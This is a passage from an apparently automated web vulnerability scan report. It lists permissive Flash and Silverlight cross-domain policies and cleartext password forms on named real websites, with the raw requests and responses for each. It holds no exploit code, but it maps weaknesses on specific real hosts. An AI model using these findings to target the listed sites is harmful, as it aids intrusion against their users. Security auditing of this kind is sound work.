Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.tsn.ca

Response

HTTP/1.1 200 OK
Cache-Control: max-age=3600
Content-Type: text/xml
Last-Modified: Tue, 16 Aug 2011 18:52:44 GMT
Accept-Ranges: bytes
ETag: "f5ca3faf455ccc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:28:28 GMT
Connection: close
Content-Length: 820

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="watch.tsn.ca" />
<allow-access-from domain="watch.ctv.ca" />
<allow-access-from domain="*.tsn.ca" />
       <allow-access-from domain="tsn.ca" />
<allow-access-from domain="*.ctvdigital.com" />
<allow-access-from domain="*.ctvdigital.ca" />
<allow-access-from domain="images.tsn.ca.edgesuite.net" />
<allow-access-from domain="*.mtv.ca" />
<allow-access-from domain="*.edgefcs.net" />
       <allow-access-from domain="ads.itravel2000.com"/>
       <allow-access-from domain="*.curltv.com"/>
<allow-access-from domain="*.daelgren.com"/>
    <allow-access-from domain="*.streamtheworld.com"/>
...[SNIP]...

6.119. http://www.usatoday.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.usatoday.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.usatoday.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 16 Mar 2011 20:16:43 GMT
Accept-Ranges: bytes
ETag: "59d64d1117e4cb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sun, 04 Sep 2011 01:28:32 GMT
Connection: close
Content-Length: 1558

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.usatoday.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.usatoday.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="projects.usatoday.com"/>
   <allow-access-from domain="*.gannettonline.com"/>
   <allow-access-from domain="www.smashingideas.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="beta.tagware.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="nmp.newsgator.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="hostlogic.ca" secure="true"/>
...[SNIP]...
<allow-access-from domain="pages.samsung.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.pointroll.com" />
   <allow-access-from domain="*.facebook.com" />
   <allow-access-from domain="demo.pointroll.net" />
   <allow-access-from domain="*.brightcove.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.metagrapher.com" />
...[SNIP]...

6.120. http://www.wtp101.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.wtp101.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.1
Host: www.wtp101.com
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: application/xml
Date: Sun, 04 Sep 2011 01:12:32 GMT
ETag: 1300113893320
LastModified: Mon, 14 Mar 2011 14:44:53 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Content-Length: 320
Connection: keep-alive

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.adap.tv"/>
<allow-access-from domain="*.nieuwefabia.nl"/>
<allow-access-from domain="*.denieuwefabia.nl"/>
...[SNIP]...

6.121. http://www.youtube.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.youtube.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Last-Modified: Fri, 03 Jun 2011 20:25:01 GMT
Date: Sun, 04 Sep 2011 01:28:37 GMT
Expires: Sun, 04 Sep 2011 01:28:37 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

<?xml version="1.0"?>
<!-- http://www.youtube.com/crossdomain.xml -->
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="s.ytimg.com" />
...[SNIP]...

6.122. http://admin6.testandtarget.omniture.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://admin6.testandtarget.omniture.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: admin6.testandtarget.omniture.com

Response

HTTP/1.1 200 OK
Server: Test & Target
Content-Type: application/xml
Date: Sun, 04 Sep 2011 01:21:50 GMT
Accept-Ranges: bytes
ETag: W/"313-1313024241000"
Connection: close
Set-Cookie: X-Mapping-obodhgke=C65CAE406CB199739E142186AC7C21A1; path=/
Last-Modified: Thu, 11 Aug 2011 00:57:21 GMT
Content-Length: 313

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="s7sps1.scene7.com"/>
<allow-access-from domain="s7sps3.scene7.com"/>
<allow-access-from domain="s7sps5.scene7.com"/>
...[SNIP]...

6.123. http://api.twitter.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.twitter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.twitter.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:49:23 GMT
Server: hi
Status: 200 OK
Last-Modified: Mon, 29 Aug 2011 17:35:22 GMT
Content-Type: application/xml
Content-Length: 561
Cache-Control: max-age=1800
Expires: Sun, 04 Sep 2011 01:19:23 GMT
Vary: Accept-Encoding
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="twitter.com" />
...[SNIP]...
<allow-access-from domain="search.twitter.com" />
   <allow-access-from domain="static.twitter.com" />
...[SNIP]...

6.124. https://docs.google.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   https://docs.google.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: docs.google.com

Response

HTTP/1.0 200 OK
Expires: Sun, 04 Sep 2011 19:29:21 GMT
Date: Sat, 03 Sep 2011 19:29:21 GMT
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=86400
Age: 21186

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="video.google.com" /><allow-access-from domain="s.ytimg.com" />
...[SNIP]...

6.125. http://matcher-rbc.bidder7.mookie1.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://matcher-rbc.bidder7.mookie1.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: matcher-rbc.bidder7.mookie1.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:22:52 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Sat, 27 Aug 2011 03:06:09 GMT
ETag: "3cd8207-116-4ab73f18d4a40"
Accept-Ranges: bytes
Content-Length: 278
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">

...[SNIP]...
<allow-access-from domain="zaptrader.themig.com" />
...[SNIP]...

6.126. http://twitter.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: twitter.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:24:53 GMT
Server: Apache
Last-Modified: Mon, 29 Aug 2011 17:35:22 GMT
Accept-Ranges: bytes
Content-Length: 561
Cache-Control: max-age=1800
Expires: Sun, 04 Sep 2011 01:54:53 GMT
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<al
...[SNIP]...
<allow-access-from domain="api.twitter.com" />
   <allow-access-from domain="search.twitter.com" />
   <allow-access-from domain="static.twitter.com" />
...[SNIP]...

6.127. http://www.traffic.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.traffic.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.traffic.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:28:02 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b mod_jk/1.2.25
Last-Modified: Wed, 22 Apr 2009 22:26:16 GMT
ETag: "a4b03-9d-4682c40737200"
Accept-Ranges: bytes
Content-Length: 157
Vary: User-Agent
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!-- http://www.wfaa.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="www.wfaa.com" />
</cross-domain-policy>

7. Silverlight cross-domain policy
There are 13 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


7.1. http://ad.doubleclick.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 19:54:04 GMT
Date: Sun, 04 Sep 2011 01:21:13 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

7.2. http://b.scorecardresearch.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Mon, 05 Sep 2011 00:42:17 GMT
Date: Sun, 04 Sep 2011 00:42:17 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

7.3. http://content.usatoday.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.usatoday.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: content.usatoday.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 03 Mar 2010 16:58:39 GMT
Accept-Ranges: bytes
ETag: "80964c5f2baca1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sun, 04 Sep 2011 00:42:14 GMT
Connection: close
Content-Length: 730

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="Content-Type,SOAPAction">
               <domain uri="*"/>

...[SNIP]...

7.4. http://metrics.sprint.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.sprint.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.sprint.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:53:11 GMT
Server: Omniture DC/2.0.0
xserver: www614
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.5. http://nmcharlotte.112.2o7.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://nmcharlotte.112.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: nmcharlotte.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:06:25 GMT
Server: Omniture DC/2.0.0
xserver: www86
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.6. http://pixel.quantserve.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Mon, 05 Sep 2011 00:45:10 GMT
Content-Type: text/xml
Content-Length: 312
Date: Sun, 04 Sep 2011 00:45:10 GMT
Server: QS

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
   <domain uri="*"/>
</allow-from>
<grant-to>
   <resour
...[SNIP]...

7.7. http://s0.2mdn.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/xml
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sun, 04 Sep 2011 00:23:13 GMT
Expires: Fri, 02 Sep 2011 23:16:39 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 1293
Cache-Control: public, max-age=86400

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

7.8. http://secure-us.imrworldwide.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 04 Sep 2011 00:52:32 GMT
Content-Type: text/xml
Content-Length: 255
Last-Modified: Mon, 19 Oct 2009 01:46:36 GMT
Connection: close
Expires: Sun, 11 Sep 2011 00:52:32 GMT
Cache-Control: max-age=604800
Accept-Ranges: bytes

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resource path="/" include-subpaths="true" />
</grant
...[SNIP]...

7.9. http://usatoday1.112.2o7.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://usatoday1.112.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: usatoday1.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:42:19 GMT
Server: Omniture DC/2.0.0
xserver: www172
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.10. http://video.od.visiblemeasures.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.od.visiblemeasures.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: video.od.visiblemeasures.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sun, 04 Sep 2011 01:17:23 GMT
Content-Type: text/xml
Content-Length: 326
Last-Modified: Wed, 09 Mar 2011 01:34:37 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from>
               <domain uri="*" />
           </allow-from>
<grant-to>
<r
...[SNIP]...

7.11. http://www.goutsa.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.goutsa.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.goutsa.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:26:15 GMT
Server: Apache
Last-Modified: Thu, 26 Mar 2009 08:16:48 GMT
ETag: "18a-466013cce5c00"
Accept-Ranges: bytes
Content-Length: 394
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
<domain uri="https://*"/>
<domain uri="http://*"/>
...[SNIP]...

7.12. http://www.tulsaworld.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tulsaworld.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.tulsaworld.com

Response

HTTP/1.1 200 OK
Content-Length: 319
Content-Type: text/xml
Last-Modified: Fri, 26 Nov 2010 22:31:11 GMT
Accept-Ranges: bytes
ETag: "88a3a1a0b98dcb1:277"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:28:24 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resour
...[SNIP]...

7.13. http://www.usatoday.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.usatoday.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.usatoday.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 03 Mar 2010 16:58:39 GMT
Accept-Ranges: bytes
ETag: "80964c5f2baca1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sun, 04 Sep 2011 01:28:33 GMT
Connection: close
Content-Length: 730

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="Content-Type,SOAPAction">
               <domain uri="*"/>

...[SNIP]...

8. Cleartext submission of password
There are 8 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


8.1. http://digg.com/submit

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:22:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=26937 10.2.129.225
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8468

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pic
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

8.2. http://www.foxsportssouthwest.com/09/03/11/Longhorn-Network-on-the-air-and-out-of-s/landing_big12.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.foxsportssouthwest.com
Path:   /09/03/11/Longhorn-Network-on-the-air-and-out-of-s/landing_big12.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /09/03/11/Longhorn-Network-on-the-air-and-out-of-s/landing_big12.html HTTP/1.1
Host: www.foxsportssouthwest.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/1.0.3
Content-Type: text/html
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Sun, 04 Sep 2011 01:26:08 GMT
Date: Sun, 04 Sep 2011 01:26:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 42382

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<!--

fsn - -->
<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<table width='100%' cellpadding=0 cellspacing=0 border=0 bgcolor=''>
<form enctype="multipart/form-data" action="/09/03/11/Longhorn-Network-on-the-air-and-out-of-s/landing_big12.html" Name= "" ID = "" method="post">
<tr>
...[SNIP]...
<td>pass:<input type=password name='login_password' class='net_loginblock'></td>
...[SNIP]...

8.3. http://www.ispsports.com/radio-network-affiliates.cfm

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ispsports.com
Path:   /radio-network-affiliates.cfm

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /radio-network-affiliates.cfm HTTP/1.1
Host: www.ispsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:26:14 GMT
